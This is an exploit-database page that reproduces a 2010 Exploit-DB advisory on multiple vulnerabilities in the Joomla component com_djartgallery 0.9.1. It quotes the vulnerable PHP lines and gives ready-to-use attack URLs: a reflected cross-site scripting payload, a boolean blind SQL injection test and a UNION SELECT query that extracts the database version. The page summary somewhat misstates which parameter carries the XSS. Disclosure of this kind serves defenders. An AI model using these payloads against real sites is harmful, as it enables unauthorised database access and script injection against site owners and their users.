header-logo
Suggest Exploit
vendor:
by:
Tomasz Kowalski
7.5
CVSS
HIGH
Cross Site Scripting, Blind SQL Injection
CWE
Product Name:
Affected Version From: 2000.9.1
Affected Version To: 2000.9.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
2010

Joomla Component com_djartgallery Multiple Vulnerabilities

The Joomla component com_djartgallery has multiple vulnerabilities including Cross Site Scripting (XSS) and Blind SQL Injection. The XSS vulnerability can be exploited by injecting code into the 'id' parameter in the editimage function. The Blind SQL Injection vulnerability can be exploited by injecting code into the 'cid' parameter in the editItem function. Both vulnerabilities allow an attacker to execute arbitrary code or extract information from the database.

Mitigation:

Update to the latest version of the Joomla component com_djartgallery. Ensure input validation and sanitization is implemented for user-supplied data.
Source

Exploit-DB raw data:

#Exploit Title:		Joomla Component com_djartgallery Multiple Vulnerabilities

#Date:			04/06/2010 

#Author:		Tomasz Kowalski

#Software Link:		http://www.design-joomla.eu/downloads/download/components/dj-artgallery.html

#Version:		0.9.1

#Tested on:		Linux ubuntu32 2.6.32-22-generic x64

#Summary:
	
[+] Cross Site Scripting on administrator/components/com_djartgallery/views/editimage/tmpl/default.php:

	We can fond this code on line 183:
	...	
	<input type="hidden" name="id" value="<?php echo JRequest::getVar('id'); ?>" />
	<input type="hidden" name="option" value="com_djartgallery" />
	<input type="hidden" name="task" value="editImage" />
	...

	You must see it }x) 	

	<input type="hidden" name="id" value="<?php echo JRequest::getVar('id'); ?>" />

	Method to exploit this could be next code injection:
	
	http://localhost/joomla/administrator/index.php?option=com_djartgallery&task=editItem
	&cid[]=%22%3E%3C/form%3E%3CSCRIPT%3Ealert%28%22XSS%20by%20r0i%22%29;%3C/script%3E

[+]Blind SQL Injection

	Also we can extract it databases information through Blind SQL Injection, on same parameter, how to we will see on next code:
administrator/components/com_djartgallery/controller.php, line 382:

	$link = 'index.php?option=com_djartgallery&task=com_djartgallery&task=editItem&cid[]='.JRequest::getVar('id');

	To exploit it:
	
	http://victim/administrator/index.php?option=com_djartgallery&task=editItem
	&cid[]=1'+and+1=1+--+

	Field 'Select Article' its changed when reply its true/false; but too its likely that run UNION injection:

	http://victim/administrator/index.php?option=com_djartgallery&task=editItem
	&cid[]=-1%27/*!UNION%20SELECT%20@@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25*/+--+

	
	
by r0i  by r0i  by r0i  by r0i  by r0i  by r0i  by r0i  by r0i  by r0i  by r0i  by r0i  by r0i

Navigation

Suggest Exploit

Services By CQR